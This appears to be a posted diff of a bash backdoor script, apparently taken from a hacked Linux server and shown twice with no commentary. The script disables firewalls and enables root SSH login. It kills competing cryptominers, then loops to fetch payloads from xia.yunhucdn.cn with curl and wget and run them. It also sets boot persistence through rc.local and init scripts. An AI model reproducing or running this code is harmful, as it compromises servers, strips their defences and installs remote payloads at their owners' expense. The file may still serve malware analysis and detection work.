kerus1024 · August 28, 2020 13:27
diff --git a/chinese-linux-backdoor-hacked.sh b/chinese-linux-backdoor-hacked.sh
 #!/bin/bash
 #chkconfig: 2345 88 14
 SHELL=/bin/sh
 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 function kills() {
 #ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
 #do
 #pkill -f $procid
 #done
 sed -i '/nameserver*/d' /etc/resolv.conf
 echo "nameserver 8.8.8.8" >> /etc/resolv.conf
 needreset=1;
 iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
 iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
 iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
 sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
 sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
 echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
 /etc/init.d/iptables stop
 service iptables stop
 sUsEFirewall2 stopresUsEFirewall2 stop
 systemctl stop firewalld.service
 systemctl disable firewalld.service
 pkill -f sourplum
 pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
 rm -rf /tmp/*index_bak*
 rm -rf /tmp/*httpd.conf*
 rm -rf /tmp/*httpd.conf
 rm -rf /tmp/a7b104c270
 pkill -f AnXqV.yam
 pkill -f biosetjenkins
 pkill -f Loopback
 pkill -f apaceha
 pkill -f cryptonight
 pkill -f stratum
 pkill -f mixnerdx
 pkill -f performedl
 pkill -f JnKihGjn
 pkill -f irqba2anc1
 pkill -f irqba5xnc1
 pkill -f irqbnc1
 pkill -f ir29xc1
 pkill -f conns
 pkill -f irqbalance
 pkill -f crypto-pool
 pkill -f minexmr
 pkill -f XJnRj
 pkill -f NXLAi
 pkill -f BI5zj
 pkill -f askdljlqw
 pkill -f minerd
 pkill -f minergate
 pkill -f Guard.sh
 pkill -f ysaydh
 pkill -f bonns
 pkill -f donns
 pkill -f kxjd
 pkill -f Duck.sh
 pkill -f bonn.sh
 pkill -f conn.sh
 pkill -f kworker34
 pkill -f kw.sh
 pkill -f pro.sh
 pkill -f polkitd
 pkill -f acpid
 pkill -f icb5o
 pkill -f nopxi
 pkill -f irqbalanc1
 pkill -f minerd
 pkill -f i586
 pkill -f gddr
 pkill -f mstxmr
 pkill -f ddg.2011
 pkill -f wnTKYg
 pkill -f deamon
 pkill -f disk_genius
 pkill -f sourplum
 pkill -f my.confe
 pkill -f pprt
 pkill -f ppol
 rm -rf /tmp/httpd.conf
 rm -rf /tmp/conn
 rm -rf /tmp/conns
 rm -f /tmp/irq.sh
 rm -f /tmp/irqbalanc1
 rm -f /tmp/irq
 PORT_NUMBER=9999
 lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
 PORT_NUMBER=5555
 lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
 PORT_NUMBER=7777
 lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
 PORT_NUMBER=14444
 lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
 apt-get install -y sysv-rc-conf
 }
 function check() {
 		if [  -f "/usr/bin/yum" ];then
 			if [ ! -f "/etc/ssh/notepad++" ]; then
 				curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 			fi
 			if [ ! -f "/etc/ssh/notepad++" ]; then
 				wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 			fi

 			if [ ! -f "/etc/ssh/notepad++" ]; then
 				curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 			fi
 			if [ ! -f "/etc/ssh/notepad++" ]; then
 				wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 			fi
 		fi
 			#nohup /etc/my.conf/notepad++ >/dev/null 2>&1 &
 			#sed -i '13a\/etc/my.conf/notepad++\n' /etc/rc.local
 			chmod 0777 /etc/rc.local 
 			if [ ! -f "/usr/bin/sysv-rc-conf" ];then
 				apt-get install -y sysv-rc-conf
 				if [ ! -f "/etc/ssh/notepad++" ]; then
 					curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 				fi
 				if [ ! -f "/etc/ssh/notepad++" ]; then
 					wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 				fi
 				if [ ! -f "/etc/ssh/notepad++" ]; then
 					curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 				fi
 				if [ ! -f "/etc/ssh/notepad++" ]; then
 					wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
 				fi
 			fi
 				nohup /etc/ssh/notepad++ >/dev/null 2>&1 &
 				rm -rf /etc/ssh/notepad++
 				sed -i '13a\/etc/ssh/notepad++\n' /etc/rc.local
 }
 function downloadyam() {
 		if [ ! -f "/etc/my.conf" ]; then
 				curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf
 				
 				if [ ! -f "/etc/my.conf" ]; then
 					wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
 					rm -rf /etc/my.conf.*
 				fi
 				
 				if [ ! -f "/etc/my.conf" ]; then
 					curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf
 					rm -rf /etc/my.conf.*
 				fi
 				if [ ! -f "/etc/my.conf" ]; then
 					wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
 					rm -rf /etc/my.conf.*
 				fi
 				#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
 				nohup /etc/my.conf &
 		else
 				p=$(ps aux | grep my.conf | grep -v grep | wc -l)
 				if [ ${p} -eq 1 ];then
 					echo "my.conf"
 				elif [ ${p} -eq 0 ];then
 					nohup /etc/my.conf -P  my.conf>/dev/null 2>&1 &
 				else
 					echo ""
 				fi
 		fi
 }
 function downloadyam1() {
 		if [ ! -f "/var/ssh.conf" ]; then
 				curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
 				if [ ! -f "/var/ssh.conf" ]; then
 					wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
 					rm -rf /var/ssh.conf.*
 				fi
 				
 				if [ ! -f "/var/ssh.conf" ]; then
 					curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
 					rm -rf /var/ssh.conf.*
 				fi
 				if [ ! -f "/var/ssh.conf" ]; then
 				
 					wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
 					rm -rf /var/ssh.conf.*
 				fi
 				
 				nohup /var/ssh.conf &
 		else
 				p=$(ps aux | grep ssh.conf | grep -v grep | wc -l)
 				if [ ${p} -eq 1 ];then
 					echo "ssh.conf"
 				elif [ ${p} -eq 0 ];then
 					nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
 				else
 					echo ""
 				fi
 		fi
 }
 function downloadyam2() {
 				if [ ! -f "/etc/init.d/S67" ]; then
 					curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
 					rm -rf /etc/init.d/S67.*
 				fi
 				if [ ! -f "/etc/init.d/S67" ]; then
 					wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
 					rm -rf /etc/init.d/S67.*
 				fi
 				
 				if [ ! -f "/etc/init.d/S67" ]; then
 					curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
 					rm -rf /etc/init.d/S67.*
 				fi
 				if [ ! -f "/etc/init.d/S67" ]; then
 					wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
 					rm -rf /etc/init.d/S67.*
 				fi
 				
 				if [ -f "/usr/bin/yum" ]; then
 					chkconfig --add S67
 					chkconfig S67 on
 				fi
 				if [ -f "/usr/bin/sysv-rc-conf" ]; then
 					cd /etc/init.d/
 					sysv-rc-conf S67 on
 				fi
 }
 while [ 1 ]
 do
 	kills
 	#check
 	downloadyam
 	sleep 20
 	downloadyam1
 	sleep 600
 done
	#!/bin/bash
	#chkconfig: 2345 88 14
	SHELL=/bin/sh
	PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
	function kills() {
	#ps aux \|grep -v sourplum \| awk '{if($3>20.0) print $2}' \| while read procid
	#do
	#pkill -f $procid
	#done
	sed -i '/nameserver*/d' /etc/resolv.conf
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf
	needreset=1;
	iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
	iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
	iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
	sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
	sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
	echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
	/etc/init.d/iptables stop
	service iptables stop
	sUsEFirewall2 stopresUsEFirewall2 stop
	systemctl stop firewalld.service
	systemctl disable firewalld.service
	pkill -f sourplum
	pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
	rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
	rm -rf /tmp/index_bak
	rm -rf /tmp/httpd.conf
	rm -rf /tmp/*httpd.conf
	rm -rf /tmp/a7b104c270
	pkill -f AnXqV.yam
	pkill -f biosetjenkins
	pkill -f Loopback
	pkill -f apaceha
	pkill -f cryptonight
	pkill -f stratum
	pkill -f mixnerdx
	pkill -f performedl
	pkill -f JnKihGjn
	pkill -f irqba2anc1
	pkill -f irqba5xnc1
	pkill -f irqbnc1
	pkill -f ir29xc1
	pkill -f conns
	pkill -f irqbalance
	pkill -f crypto-pool
	pkill -f minexmr
	pkill -f XJnRj
	pkill -f NXLAi
	pkill -f BI5zj
	pkill -f askdljlqw
	pkill -f minerd
	pkill -f minergate
	pkill -f Guard.sh
	pkill -f ysaydh
	pkill -f bonns
	pkill -f donns
	pkill -f kxjd
	pkill -f Duck.sh
	pkill -f bonn.sh
	pkill -f conn.sh
	pkill -f kworker34
	pkill -f kw.sh
	pkill -f pro.sh
	pkill -f polkitd
	pkill -f acpid
	pkill -f icb5o
	pkill -f nopxi
	pkill -f irqbalanc1
	pkill -f minerd
	pkill -f i586
	pkill -f gddr
	pkill -f mstxmr
	pkill -f ddg.2011
	pkill -f wnTKYg
	pkill -f deamon
	pkill -f disk_genius
	pkill -f sourplum
	pkill -f my.confe
	pkill -f pprt
	pkill -f ppol
	rm -rf /tmp/httpd.conf
	rm -rf /tmp/conn
	rm -rf /tmp/conns
	rm -f /tmp/irq.sh
	rm -f /tmp/irqbalanc1
	rm -f /tmp/irq
	PORT_NUMBER=9999
	lsof -i tcp:${PORT_NUMBER} \| awk 'NR!=1 {print $2}' \| xargs kill -9
	PORT_NUMBER=5555
	lsof -i tcp:${PORT_NUMBER} \| awk 'NR!=1 {print $2}' \| xargs kill -9
	PORT_NUMBER=7777
	lsof -i tcp:${PORT_NUMBER} \| awk 'NR!=1 {print $2}' \| xargs kill -9
	PORT_NUMBER=14444
	lsof -i tcp:${PORT_NUMBER} \| awk 'NR!=1 {print $2}' \| xargs kill -9
	apt-get install -y sysv-rc-conf
	}
	function check() {
	if [ -f "/usr/bin/yum" ];then
	if [ ! -f "/etc/ssh/notepad++" ]; then
	curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	if [ ! -f "/etc/ssh/notepad++" ]; then
	wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi

	if [ ! -f "/etc/ssh/notepad++" ]; then
	curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	if [ ! -f "/etc/ssh/notepad++" ]; then
	wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	fi
	#nohup /etc/my.conf/notepad++ >/dev/null 2>&1 &
	#sed -i '13a\/etc/my.conf/notepad++\n' /etc/rc.local
	chmod 0777 /etc/rc.local
	if [ ! -f "/usr/bin/sysv-rc-conf" ];then
	apt-get install -y sysv-rc-conf
	if [ ! -f "/etc/ssh/notepad++" ]; then
	curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	if [ ! -f "/etc/ssh/notepad++" ]; then
	wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	if [ ! -f "/etc/ssh/notepad++" ]; then
	curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	if [ ! -f "/etc/ssh/notepad++" ]; then
	wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
	fi
	fi
	nohup /etc/ssh/notepad++ >/dev/null 2>&1 &
	rm -rf /etc/ssh/notepad++
	sed -i '13a\/etc/ssh/notepad++\n' /etc/rc.local
	}
	function downloadyam() {
	if [ ! -f "/etc/my.conf" ]; then
	curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf

	if [ ! -f "/etc/my.conf" ]; then
	wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
	rm -rf /etc/my.conf.*
	fi

	if [ ! -f "/etc/my.conf" ]; then
	curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf
	rm -rf /etc/my.conf.*
	fi
	if [ ! -f "/etc/my.conf" ]; then
	wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
	rm -rf /etc/my.conf.*
	fi
	#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
	nohup /etc/my.conf &
	else
	p=$(ps aux \| grep my.conf \| grep -v grep \| wc -l)
	if [ ${p} -eq 1 ];then
	echo "my.conf"
	elif [ ${p} -eq 0 ];then
	nohup /etc/my.conf -P my.conf>/dev/null 2>&1 &
	else
	echo ""
	fi
	fi
	}
	function downloadyam1() {
	if [ ! -f "/var/ssh.conf" ]; then
	curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
	if [ ! -f "/var/ssh.conf" ]; then
	wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
	rm -rf /var/ssh.conf.*
	fi

	if [ ! -f "/var/ssh.conf" ]; then
	curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
	rm -rf /var/ssh.conf.*
	fi
	if [ ! -f "/var/ssh.conf" ]; then

	wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
	rm -rf /var/ssh.conf.*
	fi

	nohup /var/ssh.conf &
	else
	p=$(ps aux \| grep ssh.conf \| grep -v grep \| wc -l)
	if [ ${p} -eq 1 ];then
	echo "ssh.conf"
	elif [ ${p} -eq 0 ];then
	nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
	else
	echo ""
	fi
	fi
	}
	function downloadyam2() {
	if [ ! -f "/etc/init.d/S67" ]; then
	curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
	rm -rf /etc/init.d/S67.*
	fi
	if [ ! -f "/etc/init.d/S67" ]; then
	wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
	rm -rf /etc/init.d/S67.*
	fi

	if [ ! -f "/etc/init.d/S67" ]; then
	curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
	rm -rf /etc/init.d/S67.*
	fi
	if [ ! -f "/etc/init.d/S67" ]; then
	wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
	rm -rf /etc/init.d/S67.*
	fi

	if [ -f "/usr/bin/yum" ]; then
	chkconfig --add S67
	chkconfig S67 on
	fi
	if [ -f "/usr/bin/sysv-rc-conf" ]; then
	cd /etc/init.d/
	sysv-rc-conf S67 on
	fi
	}
	while [ 1 ]
	do
	kills
	#check
	downloadyam
	sleep 20
	downloadyam1
	sleep 600
	done